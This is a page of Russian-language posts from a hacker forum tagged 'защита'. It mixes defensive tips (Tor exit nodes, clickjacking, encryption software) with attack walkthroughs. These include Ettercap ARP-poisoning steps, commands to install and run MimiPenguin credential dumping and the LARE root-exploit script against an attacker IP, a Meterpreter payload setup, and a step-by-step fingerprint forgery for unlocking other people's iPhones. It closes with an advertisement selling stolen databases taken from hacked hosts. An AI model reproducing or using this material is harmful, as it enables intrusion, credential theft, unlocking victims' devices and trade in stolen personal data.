Новости и объявления.
- Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
Search the Community
Showing results for tags 'защита'.
-
Поддельные выходные узлы Tor Значительная часть выходных узлов Tor выполняет вредоносные действия с трафиком. Примерно 25% выходных узлов сети Tor пытаются перехватить трафик пользователей. В первую очередь это происходит в виде прокси-атак MITM (человек по середине), с помощью таких инструментов, как mitmproxy и sslstrip. По этой причине, при использовании Tor, не стоит заходить в свою основную почту и в свои аккаунты социальных сетей. Как защититься от поддельных выходных узлов Tor Существуют различные способы защиты от поддельных выходных узлов Тор, как для Windows так и для Linux. Использование режима только для HTTPS Самый простой способ — принудительно использовать безопасное соединение HTTPS. Использование HTTPS снижает вероятность того, что трафик будет перехвачен. Следует также обращать внимание и анализировать домен (название сайта). HTTPS Everywhere — расширение для всех популярных браузеров, созданное в сотрудничестве с Tor Project. HTTPS Everywhere форсирует защищенное соединение через HTTPS на всех сайтах, где это возможно. Если пользователь попробует зайти на незащищенную версию сайта, плагин все равно перенаправит его на HTTPS-версию, если она доступна. С годами HTTPS Everywhere приобрел культовый статус среди правозащитников, приверженцев конфиденциальности и вскоре было интегрировано в браузер Tor, а затем и в другие популярные браузеры. Он не такой хардкорный, как настройка HTTPS-Only Browser Mode в Firefox, но по-прежнему обеспечивает определенную степень защиты в других браузерах, отличных от Firefox. Я использую этот плагин во всех браузерах. Это не панацея, но уменьшает риск. Еще один хороший способ защититься от поддельных выходных реле — использовать скрипт noContactInfo Tor Exit Relay Excluder. Защита от поддельных выходных узлов с помощью noContactInfo Большая часть вредоносных выходных узлов не имеет контактной информации. Эксперт информационной безопасности Nusen написал скрипт для браузера Tor, который при серфинге исключает эти поддельные узлы. Для использования на Windows, необходимо установить Python. Для использования на Linux со службой Tor пришлось немного пошаманить. Вот как установить и использовать noContactInfo на Linux. Установите nyx: sudo apt install nyx Измените файл torrc: sudo nano /etc/tor/torrc Раскомментируйте первые две строки и измените: ControlPort 9051 CookieAuthentication 1 ControlSocket /var/run/tor/control GroupWritable RelaxDirModeCheck UseMicrodescriptors 0 Закройте и сохраните изменения. Перезапустите Тор: sudo systemctl restart tor Скачайте скрипт с Github: wget https://raw.githubusercontent.com/TheSmashy/TorExitRelayExclude/main/exclude_noContactInfo_Exits.py Измените права: sudo chmod +x exclude_noContactInfo_Exits.py Запустите Nyx, чтобы убедиться, что Tor загружен и открыто управляющее соединение: sudo nyx Выйдите из Nyx (дважды нажав на клавишу Q) и запустите скрипт: sudo python3 exclude_noContactInfo_Exits.py Скрипт теперь будет загружать и анализировать все выходные реле. При завершении работы скрипта, вы увидите информацию о количестве исключенных узлов. Заключение Используя HTTPS и этот скрипт, вы улучшаете свою анонимность / безопасность при работе в Tor, но идеальной безопасности, как вы понимаете, не бывает. Конфиденциальность и анонимность в сети — это постоянная борьба. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как можно защитить свой браузер от различного вида взломов. Браузер хранит абсолютно все ваши данные — начиная от сессий в разные социальные сети и заканчивая логинами, паролями и историей. И если злоумышленник получит доступ к вашему браузеру — ущерб будет как денежный, так и моральный. Лучший способ защититься от этого — поставить пароль на браузер с помощью PassBrow. Каждый раз, когда вы входите в браузер, это расширение будет спрашивать пароль. Неприятный минус: в триал версии всего 10 запусков в день. Но PassBrow можно поставить сразу же на все браузеры: Chrome, Opera, Edge и прочие. Пользоваться им проще, чем открыть банку с Колой. Устанавливаем расширение, придумываем пароль и нажимаем "Сохранить". С помощью такого небольшого сервиса вы можете значительно увеличить собственную безопасность и безопасность своих данных, поэтому рекомендую использовать его абсолютно каждому, чтобы не информация из вашего браузера не попала в руки третьим лицам. Сервис Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! Каждый раз, когда вы нажимаете на кнопку на сайте — вы рискуете стать жертвой кликджекера. Вы кликаете с виду по обычной ссылке, но она ведет на вредоносный сайт. Например, на фишинг или другую мошенническую страницу, которая манипулирует вашим компьютером и крадёт личные данные. Обычно мошенники атакуют официальный сайт и перехватывают его невидимым HTML-элементом iframe, что и позволяет красть ваши клики. В другом случае создаётся специальный сайт для такого вида мошенничества в сети. Чтобы предотвратить кликджекинг, установите расширения для браузера. Например, No ClickJack (https://chrome.google.com/webstore/detail/noclickjack/ljkbghpfokmghicbbbemglhflkmjampc) для Google Chrome и NoScript (https://addons.mozilla.org/ru/firefox/addon/noscript/) для Firefox. Это надёжные и бесплатные плагины: они автоматически показывают скрытые веб-слои, которые захватывают ваш клик и перенаправляют на опасные сайты. Используйте их — и спокойно кликайте по любым сайтам без опаски. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Представляем вашему вниманию подборку довольно неплохих программ для шифрования данных. 1) Cryptainer - это бесплатное решение, которое позволяет создавать защищенные паролем крипто-контейнеры как для надежного хранения данных в операционной системе, так и для обмена по электронной почте. 2) ScramDisk - виртуальный зашифрованный диск, созданный этой программой, позволяет устанавливать на него приложения. ScramDisk также может скрывать зашифрованную информацию в существующих * .wav файлах. 3) TrueCrypt - это программа с открытым исходным кодом, которая позволяет создавать виртуальные зашифрованные диски. Функции безопасности TrueCrypt намного понятнее, чем программы шифрования на основе файлов. Во-первых, его можно зашифровать в контейнере, что значительно ускоряет работу в целом. Во-вторых, TrueCrypt поддерживает большие ключи, вплоть до 448-битных для алгоритма Blowfish. (Кроме того, программа имеет еще четыре алгоритма.) В-третьих, каскадное шифрование поддерживает до 768-битных ключей. В-четвертых, существуют версии для Windows и Linux как для 32-разрядных, так и для 64-разрядных. Это при небольшом размере программы становится неожиданным плюсом - выделив всего 2 МБ на флешке для всех возможных версий программы, вы можете работать на любом компьютере. Официальная русификация не лишняя. 4) CryptCD Для работы с компакт-дисками лучше использовать специализированный CryptCD (www.timesavesoftware.com). Эта программа создает самозапускающийся защищенный паролем компакт-диск, который можно открыть на любом компьютере и после работы удалить из дисковода с полной уверенностью, что данные недоступны для посторонних глаз. Шифрование выполняется со сжатием, поэтому на стандартном компакт-диске будет содержаться больше информации, чем на обычных 700 МБ. 5) Steganos Security Suite 2007 - многофункциональный комплекс. Помимо защиты данных в контейнере, он имеет генератор паролей, систему шифрования электронной почты, систему безопасности в Интернете, утилиту гарантированного удаления данных и другие функции. Программы шифрования диска в целом SafeGuard Easy - программа предназначена для корпораций, мобильные сотрудники которых оснащены ноутбуками, рассчитаны на работу не более чем с двумя жесткими дисками и могут шифровать информацию на уровне раздела или диска. Системный администратор может удаленно разблокировать компьютер, если пользователь забудет пароль. 1PGP Whole Disk - логическая разработка линейки продуктов PGP. Доступен в двух версиях: для профессионалов и для предприятий. Последнее отличается добавлением инструмента PGP Universal Server для администрирования и настройки, установки и управления правилами. Программа имеет уникальную функцию восстановления пароля, которая устраняет необходимость глобального пароля администратора.
-
Привет, хакеры, расскажу о способе поиска уязвимостей, которым пользуются наиболее популярные винлокеры - Petya, WannaCry и т.д. Скачав и установив данное приложение Eternal Blues, прописываете свой ip адресс и жмёте Scan, начав сканирование. Можете выбрать компьютеры, необходимые вам для использования в данных махинациях. NO RESPONSE означает уязвимость вашей операционной системе к данным эксплойтам. Чтобы устранить данную страшную уязвимость, необходимо скачать и установить патч безопасности Microsoft, патч для определенной версии операционной системы Windows 7 32 bit Windows 7 64 bit Windows 8.1 32 bit Windows 8.1 64 bit Windows 10 32 bit Windows 10 64 bit Перезагружаем компьютер. Уязвимости не представляет опасности. Данные меры являются ключевыми в обеспечении безопасности собственных данных и устройства. Рекомендую ознакомится каждому человеку с данным патчем и установить его, если ранее не выполняли подобные действия. Проигнорировав подобные уязвимости, можете стать заложником того, кто сможет использовать подобные эксплойты в вашей системе и заполучить или уничтожить персональные данные. Я никого ни к чему не призываю, статья написана в ознакомительных целях!
-
Привет, хакеры, присутствие в сети таких протоколов как NBNS и LLMNR дает возможность злоумышленникам не только проводить атаки, перехватывающие пароль юзеров, но и возможность использования популярный атаки – SMB Relay Данный вид атаки дает возможность мошеннику похитить данные для аутентификации, который будут передаваться между узлами, во время работы NTLM Challenge-Response. Как осуществляется атака? Метод атаки не вызывает затруднений у взломщиков, хакер проверяет трафик сети и выжидает время, когда узел будет подключен к другому узулу. Когда подобный процесс выполняется, это сразу обнаруживается и злоумышленник использует такую атаку, как LLMNR Spoofing. Данный метод позволят похитить информация аутентификации, которую отправляет один из узлов, пересылая на сервер, находящий под атакой. Ответ приходит в виде просьбы сделать шифр на некое сообщение, используя собственный хэш и отправляя его обратно на узел. После сообщение перехватывается и отправляет в другое место. Из-за отправки сообщения под определенным хэшом, сервер, находящий под атакой, покажет взломщику разрешение на аутентификацию. Следом хакер проходит данный процесс, а пользователь с другого узла получает информацию об ошибке подключения. Данный вид атаки очень древний, поэтому 11 лет назад Microsoft создала бюллетень по безопасности, ссылка - https://docs.microsoft.com/ru-ru/security-updates/SecurityBulletins/2008/ms08-068?redirectedfrom=MSDN А операционная система получила обновление. Имея данное обновление, злоумышленник не сможет провернуть данную атаку. Однако другие домены в узле можно атаковать, только с условием, что на домене отсутствует подпись пактов SMB Как легко хакеры проводят данную атаку можно увидеть своими глазами, из результатов пентеста. Сканируя сетевой трафик, был замечен компьютер, запрашивающий информацию с другого узла, обратно пересылая HTTP-пртоколы. Используя программу Responder легко атакуется подобный уязвимый узел, сделав всего лишь запрос подключения с узла, который делал запросы компьютеру. Это позволяет использовать все возможности юзера, которые он имел во время проведения аутентификации. В данном моменте удалось заполучить абсолютный контроль над сервером. Не забывайте, провести подобную атаку легко. В больших компаниях, обычно, используются определенные системы, которые работаю со всей информацией и выполняет определенные задачи. Это означает, что подобные системы ежесекундно перенаправляют огромное количество данных через узлы, что позволяет хакерам использовать данный вид атаки. Защита от атаки Защититься тоже не является проблемой, делается при помощи использования SMB-пакетов, подключенных ко всем уязвимым узлам системы, а также отключение первых двух протоколов, указанных в начале статьи.
-
Зайти в Windows можно при помощи паролей или же благодаря смарт-картам. Администратор проводит настройку таким образом, чтобы компьютер делал запрос на определенную смарт-карту, которая дает доступ к Операционной системе. Метод двухфакторной аутентификации заключается в том, что человек должен знать не только какой-либо код доступа, но и обладать вещью для разблокировки, в данном случае – смарт-карта. Только при необходимом сертификате смарт-карта даст возможность ввода пин-кода, после чего пользователь может запустить операционку. Во время настройки пользователя, на домен устанавливается атрибут, который необходим для работы аутентификации с помощью смарт-карты, к данному пользователю приписывается какой-то NT-хэш. Значения данного хэша устанавливается случайно и в будущем никак не изменяются. Контроллер домена во время проведения аутентификации пересылает данный хэш в узел, подключение к которому производится. Атака Pass the hash Уязвимость работает по данному принципу: мошенник получает тот самый NT-хэш и благодаря нему проводит аутентификацию, используя способ pass the hash. Узнав данную информацию, злоумышленнику не нужно будет иметь смарт-карту или пин-код для получения доступа. А т.к. хэш в будущем неизменен, то злоумышленник получается возможность подключаться к ресурсам в любой момент времени. Для получения хэша используется инструмент Mimikatz прямо на сетевых узлах, со сценариями от 1 до 3. Помимо хэша и соответственно пароля учетной записи, можно узнать реальный пин-код смарт-карты. Запуская на сетевых узлах инструмент Mimikatz, появляется возможность копирования всех данных с привилегированных учетных записей, даже в случае использования двухфакторной аутентификации. Авторизация в данной операционной система построена так, что не получив прямого доступа к пользователю администратора, он получит хэш. А если он неизменен, то позволяет использовать его на прочих узлах сети. Данный методы дают возможность использования атаки и обхода данного метода защиты. Защита от уязвимости Windows 10 имеет в своем арсенале Remote Credential Guard, необходимая для защиты пользователей, во время удаленной работы. Данная вещь повышает безопасность, при попытке использования атаки.
-
Ettercap – программа предназначенная для сканирования сетевого трафика, который проходит через ПК, имея специальные опции. Приложение способно проводить атаки “man in the middle”, которое вынуждает другое устройство отсылать пакеты не роутеру, а прямо вам. Wireshark – популярная утилита, позволяющая перехватывать и сканировать трафик, является стандартной программой для образования и troubleshooting. Она поддерживает огромное множество протоколов, что делает ее универсальным инструментом, прибавляя к этому удобный интерфейс и сильнейшие фильтры Атака “Man In The Middle” – одна из атак криптографии, при которой взломщик крадет и изменяем сообщения, используемые для обмена информацией между корреспондентами, примечательно тем, что никто не догадывается об изменениях. Итак, первым делом необходимо установить подключение с сетью. Далее включаем первую программу, она имеет собственный интерфейс. Необходимо узнать, какие ип-адреса подключены к данной сети. Переходим в Sniff и там выбираем unified sniffing В данном разделе необходимо определиться с типом сети, которая будет отслежена. Нам необходима беспроводная сеть. Готово, теперь доступен специальный функционал. Необходимо выбрать Host, далее Scan for hosts. Когда сканирование будет завершено, переходим в список всех хостов, найденных на данном этапе. Что их увидеть переходим в Hosts – Hosts list Здесь выбираем: 1. Ип-адреса, необходимые для отслеживания 2. Устанавливаем слежу на них, нажатием Add to Target 1 и Add to Target 2 Далее входим в Mitm – ARP poisoning, где включаем опцию sniff remote connections, и конечно же начинаем отслеживание, нажав на кнопку Start Теперь запускаем вторую программу списка – Wireshark Данный способ атаки, совершаемый именно этими инструментами, можно совершать только на сайты, находящиеся на незащищенном протоколе – http. С протоколом https не выйдет. Не забывайте, что подключаясь к общественной сети, тоже можете подвергнутся хакерской атаке. Методы защиты: 1. Не допускайте возможности подключения к вашей сети неизвестных 2. Во время использования общественных сетей, не забывайте об возможно кражи ваших паролей. 3. Пользуйтесь VPN, подобные технологии помогут обезопасить вас от множества видов атак 4. Лучший способ защиты – сертификат SSL Надеюсь информация полезна и поможет вам избежать подобных атак или успешно провести их. К действиям не призываю!
-
Часто люди задаются вопросом, а почему Линукс практически неуязвим к вирусам, почему хакеры сидят именно на нем? Каким образом оно не взламывается? Существует несколько пунктов, которые подтверждают этот факт, в данной статей будет написано 7 таких причин. 1. Популярность ОС Windows для персональных компьютеров гораздо выше, чем на серверах, где используется Linux. 2. Всю работу на линуксе пользователь изначально выполняет под пользователем, не имеющим привилегий. Рут доступ к изменению файлов системы выполняется только самой операционкой. Обычный человек имеется право только для чтения системных файлов, это позволят иметь хорошую защиту от вирусов, вредоносные программы не могут изменять внутренние файлы. 3. Операционка имеет другую подсистему прав, в отличии от виндовс не имеется реестра, настройки программ сохранятся по адресу /etc, обычный юзер владеет только правами чтения. В Windows для работы большого количества приложений требуется доступ к записи системных файлов. Это означает, что вирус не сможет изменить никаких строк в компьютерной системе. 4. Допустим если человек запустил вирус, удаляющий данные с компьютера, то самой серьезной бедой будет удаление информации домашнего каталога. Удаление системы произойти не может. Пользователь может запустить вредоносную программу, запускающую сервис, подключающий юзера к определенному хосту для извлечения важных данных. Перезагрузив устройство вредоносный код не запустится автоматически. Отсутствует возможность изменения скриптов внутренней части, чем часто пользуются малвари. 5. Люди владеющие Unix-подобными системами очень компетентны, значит они намного лучше производят контроль. 6. Линукс имеет мощнейший Firewall являющийся компонентом ОС. Произведя хорошую настройку можно добиться существенного повышения безопасности. 7. Программы никогда не запускаются самостоятельно, важнейшая часть безопасности подобных операционок.
-
Друзья, сегодня минимум слов, максимум дела! В материале ниже будем смотреть инструменты пост-эксплуатации для систем Linux! Что можно сделать после того как ты уже прорвался во внутренний периметр сети, или, как на CTF-соревнованиях, когда ты получил доступ к уязвимой тачке и готов броситься в бой дальше! Пост-эксплуатация в практике пен-теста Пост-эксплуатация (англ. post-explotation) — это то, что можно сделать с целевой системой после того, как удалось найти уязвимость и выполнить какой-то участок кода на целевой системе. Так же под этим термином понимается один из этапов взлома компьютерных систем (фаза) позволяющая собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза пост-эксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений. Фазы (этапы) проведения тестирования на проникновение Основные паттерны, по которым работают злоумышленники на этапе пост-эксплуатации: получить доступ на выполнение произвольного кода\команд изучение данных, хранящихся на сервере перехват данных, которых нет на системе сейчас, но они могут появиться в будущем организация перманентного доступа к целевой системе эскалация привилегий до уровня системы для непривилегированной учетной записи Дополнительно, хакер может получать информацию о скомпрометированной системе, анализируя следующие параметры: конфигурацию системы (логин и пароль к БД в исходных кодах) конфигурацию веб-сервера (например, httpd.conf, .htaccess) исходные коды приложения (поиск уязвимостей, анализируя логику приложения) доступы к окружению (находясь внутри сети может быть проще попасть на соседние сервера и изолированные сегменты подсети) базы данных (аутентификационная информация к другим системам, хранящаяся в них Обзор инструментов пост-эксплуатации Мы же в материале сделаем акцент на рассмотрение инструментов пост-эксплуатации исключительно под Linux-системы. 1. PXEenum — полное перечисление всего что есть в системе Основной задачей данного скрипта является функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Данный скрипт создан, если не сказать, что создан для лентяев то для тех, кто ценит свое время. Для запуска он не требует прав root’а, работает в стандартном терминале. # wget https://raw.githubus...ster/PXEnume.sh Установка: # git clone https://github.com/s...uong/PXEnum.git # cd PXEnum/ # chmod +x PXEnum.sh # bash PXEnum.sh 2. MIDA Multitool — палим систему по взрослому Другой интересный инструмент MIDA Multitool созданный на базе менее именитых собратьев SysEnum и RootHelper, но включающий в себя гораздо больший функционал. По воле разработчика функционал MIDA Multitool включает в себя отдельные функции своих предшественников под одним капотом, а именно: SysEnum — Bash скрипт, предназначенный для получения основной информацию о системе, включая, но не ограничиваясь следующими данными — текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы и т.д. Roothelper — призван помочь в процессе эскалации привилегий в системе, которая была скомпрометирована, путем выполнения ряда перечислений и использования доверительных сценариев. Устанавливаем скрипт в систему с github: # git clone https://github.com/N...h-Kit-Multitool # cd Bash-Kit-Multitool # chmod +x bashkit.sh Запускаем скрипт: # /.bashkit.sh Дело сделано! Можно запускать в системе! 3. MimiPenguin — тырим пароли без зазрения совести Очень хорошо известный скрипт в узких кругах пен-тестеров под названием MimiPenguin. основной задачей утилиты служит сброса пароля на вход в систему от текущего пользователя Linux. Если такое сравнение возможно то это аналог утилиты mimikatz для дампа пароля в Windows системах (о ней мы уже рассказывали в одной из наших прошлых статей) Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), популярнейший web-сервер Apache2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и openssh-сервер (активные подключения SSH с использованием команды sudo). И вообще необходимо сказать, что MimiPenguin часто становится частью эксплойтов под Linux. Устанавливаем MimiPenguin забирая его с репозитория GitHub: # git clone https://github.com/h...gal/mimipenguin # cd mimipenguin # ls –a # chmod +x mimipenguin.sh # ./mimipenguin.sh 4. LARE — ломимся под рута используя баги ядра И напоследок еще один довольно простой скрипт, который помогает с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплойты для получения root прав для версий ядра Linux Kernel v2.6-v4.8. Кстати, эта тулза очень часто находит свое применение на пиздатом сертификационном экзамене OSCP. Устанавливаем скрипт в систему: # git clone https://github.com/EnigmaDimitri/LARE && cd LARE # chmod +x LARA.sh # LARE.sh -a Запуск скрипта на целевой машине в сети # LARE.sh -l [Attackers-IP] Запуск на машине с подключением к базе данных эксплойтов на GitHub # LARE.sh -l or ./LARE.sh -l Проверка и защита системы от техник пост-эксплуатации Для обеспечения безопасности системы на предмет пост-эксплуатации, по мимо традиционных вариантов защиты как то установка патчей (security patch) и минимизация привилегий, дополнительно существуют специальные тулзы для проверки системы. Ведь в противовес неправильно сложившегося мнения, к пост-эксплуатации не обязательно ведут только 0-dayили устаревший софт,
-
- инстурмент
- метод
- (and 11 more)
-
Всем приветствую, некоторых продвинутых пользователей мучает вопрос, а как же проводятся исследования закрытого кода iOS. Теперь есть ответ, ведь издательство Motherboard провело расследование и выяснило, каким же образом можно исследовать уязвимости яблочного устройства. Как оказалось, что серый рынок прототипов смартфонов неплохо развит, ведь именно с помощью данный прототипов исследователи получает и узнает большое количество новых эксплойтов. Данные прототипы не имеют большинства функций обеспечения защиты, а это значит, что можно выполнять огромное количество опытов для взлома уже вышедших смартфонов. Прототипы данных устройств является не дешевым удовольствием, вот примерные цены таких: iPhone 6 – 1300 долларовiPhone 8 Plus – 5000 долларовiPhone XR – 20000 долларовВпечатляет, неправда ли? Однако это не все, ведь для того чтобы данные устройства можно было использовать в таких прототипах необходимы специальные USB-кабели, которые носят названия “kanzi”. Название немного ироничное, ведь так называется бельгийской сорт яблок, а также название самца карликового шимпанзе. Ценник на такой кабель – 2000 долларов. Как предполагалось, эти устройства и данный кабель были созданы специально для создателей и разработчиков новых устройств компании Apple, однако после того инсайдеры из Foxcon вложили много сил, то прототипы стали попадать на китайский рынок электроники в городе Шеньчжень, где их уже скупают большое количество исследователей на всем земном шаре, чтобы проводить с ним различные манипуляции.
-
- безопасность
- айос
-
(and 12 more)
Tagged with:
-
Всем привет, наверняка вы во многих фильмах видели, как злодеи взламывали биометрические пароли. Так вот, сейчас я хочу подробнее рассказать вам об этом и доказать, что биометрические системы можно обойти, например, для получения доступа к айфонами. Предисловие Думаю, не стоит обсуждать для чего вам понадобились чужие отпечатки и доступ к чужим смартфонам, меня это уже не касается. Поэтому вдохновляясь Разрушителями Легенд, когда они пытались обойти биометрические сканеры, я отравился в гугл, чтобы узнать об этом как можно больше и получить опыт в этом. Необходимые вещи 1.Как ни странно, но первым делом нам нужно заполучить сам отпечаток, с помощью которого можно разблокировать смартфон. Например, данный отпечаток можно сфотографировать, после того как жертва оставит его на чем-либо. Чтобы отпечаток было лучше видно, вам нужно будет посыпать его грифелем. 2.Лазерный принтер и необходимая для него пленка Да, нужен именно лазерный, для данной работы не подойдет даже самый технологичный струйный принтер. 3.Фотополимер Verbatim Что это и какими особенностями он обладает вы сможете узнать на просторах интернета. Кстати, это правда интересно. 4.Небольшие стеклышки Те, который используются в больницах для проверки крови или такие же как на уроках биологии, которые использовались для наблюдения под микроскопом различных вещей. 5. Лампа с ультрафиолетовыми лучами 6. Стиральный порошок 7. Компьютер на котором имеется фотошоп 8. Пачка от сигарет Приступаем к самой работе 1.Первым делом открываем сфотографированный нами отпечаток пальца в фотошопе, после чего увеличиваем его до необходимых размеров и при необходимости дорисовываем линии, которые плохо отобразились. После этого переводим фото в негатив. 2. Теперь нам нужно уменьшить картинку до размера пальца и все это сохранить. 3. Далее нам нужно распечатать на пленке принтера данной отпечаток, этот пункт является самым сложным, ведь нам нужно угадать точный размер отпечатка, а сделать это довольно трудно. 4. Берем отдельную пленку и вырезаем от нее кусок чуть более чем наш отпечаток. 5. Теперь в ход пойдет пачка от сигарет, из который нам нужно сделать такой же кусок. 6. Теперь достаем стекло, прикладываем к нему чистый кусок пленки, после этого капаем на него немного полимера, самое важное, чтобы не переборщить. 7. Теперь целофан, который мы ободрали с пачки сиграет мы прикладываем к пленке и накрывает это все другим стеклышком. 8. Теперь нам нужно включить лампу ультрафиолета и начать “прожарку” всей этой херни. Делаем это на протяжении десяти минут. 9. После прожарки нам нужно убрать стекло, которое накрывает все это и забираем пленки, предварительно с большой осторожностью убрав целофан. Отлично, у нас есть что-то похожее на силикон. Главное выполнить все правильно, если эта штучка будет слишком твердой, то вы передержали включенной лампу, если слишком мягкая, то наоборот – недодержали. 10. Теперь обратно ложим касок пленки на стекло, после чего ложим на него сверху наш отпечаток пальца и опять накрываем его другим стеклом. 11. Опять ставим на прожарку под ультрафиолет. После чего с большой скоростью снимает стекло, аккуратно снимаем плену и пускаем пленку под струю теплой воды, чтобы пленка придалась рельефу. 12. После промывки этот кусочек опять кладем на пять минут под ультрафиолет и ждем, когда она затвердеет. 13. Когда она затвердеет, нам нужно содрать резину с пленки и аккуратненько обрезать. Все готово, теперь данный отпечаток вы можете приложить к своему пальцу и с легкостью разблокировать яблочные смартфоны.
-
Всем привет, в данной статье я бы хотел вам рассказать о том, как рядовой пользователь может защищать свое соединение благодаря SSL сертификата. Данный протокол дает возможность безопасного обмена информации между пользователем и сервером. Данные шифруется благодаря открытому ключу. Существует два ключа, которые используются не только для шифрования, но и для расшифрофки информации. То есть если один ключ вы использовали для шифрования данных, то второй будет использован в обратных целях. А это значит, что вы можете принимать тайные сообщения, но секретный ключ хранить вдалеке от всех. Этот протокол пользуется средой, где есть несколько слоев, которые дают ту самую безопасность информации при обмене. Безопасность заключается в том, что сообщения получает определенных пользователь. SSL находится между 2-мя протоколами: протокол самого клиента а также транспортный протокол. Делая, скажем так, ворота с двух сторон, дают необходимую защиту и отправляет информации через транспортные протоколы. Так как SLL является многослойным протоколом, то он может поддерживать большое количество других клиентских протоколов. Состоит SSL их двух слоев. 1 слой – это уровень который подтверждает подключение. Первый же слой состоит из 3 под-слоев: подтверждения подключения, изменение параметров шифра и протокол предупреждения. 2 слой – это уровень, который отвечает за запись информации. После того, как клиент начал работы с сервером SLL, брэндмауер берет SSL запроса от клиента и отправляет его на сервера. Данный сервер в свою очередь отправляет клиенту сертификат, который забирается брэндмауером. Если сертификат является тем, которому наш брэндмауер доверяет, то создается дубликат и отправляется дальше клиенту для проверки подлинности. Итак, как же все-таки создать данный сертификат с помощью Meterpreter, я сейчас расскажу вам несколько пунктов: Скачиваем репозиторий с GitHub После чего запускаем скрипт запуска. Тыкаем на клавишу Enter, после чего делаем попытку создания сертификата. После этого нам нужно выбрать домен. После чего выбираем один из вариантов полезной нагрузки. Вписывает адрес хоста, который будет атаковать, а также порт. Опять выбираем один из вариантов полезной нагрузки. После этих действий будет создан файл, на которым будет иметься полезная нагрузка, а также сертификат PEM PEM – это является самым распространенным вариантом среди центров сертификации. Отлично, теперь просто запускает пайлоад на целевом хосте и получаем долгожданный сертификат SLL.
-
- создание
- сертификат
- (and 9 more)
-
Как и все социальные сети, многими любимый Телеграм также подвержен взломам, особенно если речь идет об больших канал, где находится порядочное количество пользователей. Взлом Telegram Ничего нового и удивительного, угоняют учетки от телеграма методом фишинга! Например, пользователю приходит сообщения с телеграм аккаунта, который очень похож на настоящий аккаунт тех. Поддержки, где будет написанно, что была у вас была выявлена подозрительная активность, и что вы должны будете подтвердить свой аккаунт, а если вы это не выполните, то он будет “Заблокрован”. Вам дадут специальную ссылку, перейдя по который, вы должны будете подтвердить свой аккаунт. Как вы уже догадались, эта ссылка приведет вас на фейковый сайт, который на первый взгляд будет внушать доверие. Ссылка будет максимально похожей на оригинал. Естественно сам сайт будет выглядеть точно также, как и официальный сайт Телеграм. Вам предложат ввести свой номер, код подтверждения, и если вы включали двухфакторную аутентификацию, то вам придется вводить еще и пароль. Если вы не помните пароль, то злоумышленники переправят вас на ссылку с настоящим восстановлением данных, кликнув по который вы сможете восстановить пароль по-настоящему, а после этого вы его введете на фейковой страницу. Когда все это произошло, злоумышленники сразу же получают все необходимую информацию для входа в аккаунт. После чего он связывается с другим номером телефона. Вместе с вашим аккаунтом, они получат доступ ко всем каналам пользователя, которые в будущем смогут использовать в корыстных целях. Защита от взлома Придерживаясь нескольких небольших правил, вы с легкостью сможете защитить свой аккаунт в Telegram: Подключайте двухфакторную аутентификацию к вашему аккаунту. Это не сто процентная гарантия того, что вы будете защищены, но в случае взлома, придется потратить намного больше усилий при ее включении.Не доверяйте тем, кто не находится в вашей адресной книге и никогда не нажимайте на ненадежные ссылки. У тех. поддержки Телеграма есть специальные подтверждающие метки, поэтому доверяйте только им.Когда вы получите сообщение якобы от тех. поддержки, но у аккаунта не будет специальной метки, то можно будет сразу понять, что перед вами злоумышленник. Так же фактор, по которому можно определить, что вас хотят взломать, это то, что сообщения тех. поддержки попадает в папку спам. Мы люди не глупые и понимаем, что они не помечали свои же сообщения спамом. Убедитесь, что соединение с сайтом защищено, прежде чем начать вводить какие-то личные данные. Официальный сайт телеграма выглядит вот так – telegram.org и никак иначе, если вы увидели что-то другое в адресной строке, то сразу же уходите от туда, это с большей долей вероятностью – фейковый сайт.
-
Приветствую вас уважаемые друзья на данном хакерском ресурсе, предлагаю вашему вниманию услугу по добыче баз данных, любых систем и Базы данных MySQL любых хостов кроме гос сайтов, на таких сайтах скачать базу или скопировать возможностей нет, возможно только изменение информации по конкретной личности, с остальными же базами работаем и довольно хорошо, опыт работы почти 5 лет, гарантия качества и гарантия того что база свежая! Работаем только по базам данных, по корневым каталогам сайтов и файловым системам. По взлому почт страниц и прочего не работаю. Только базы данных, базы почт, базы страниц и прочего. По страницам и почтам хочу чуть чуть приоткрыть занавес, меняйте чаще пароль своих страниц соц сетей и почт, многие люди уже взломаны и даже не знают об этом, так базы по социальным сетям и почтам пополняются, вообщем я на данном сайте новенький и продаю базы. Обращайтесь на почту: [email protected]
- 3 replies
-
- продам базу
- доступ к базе данных
- (and 11 more)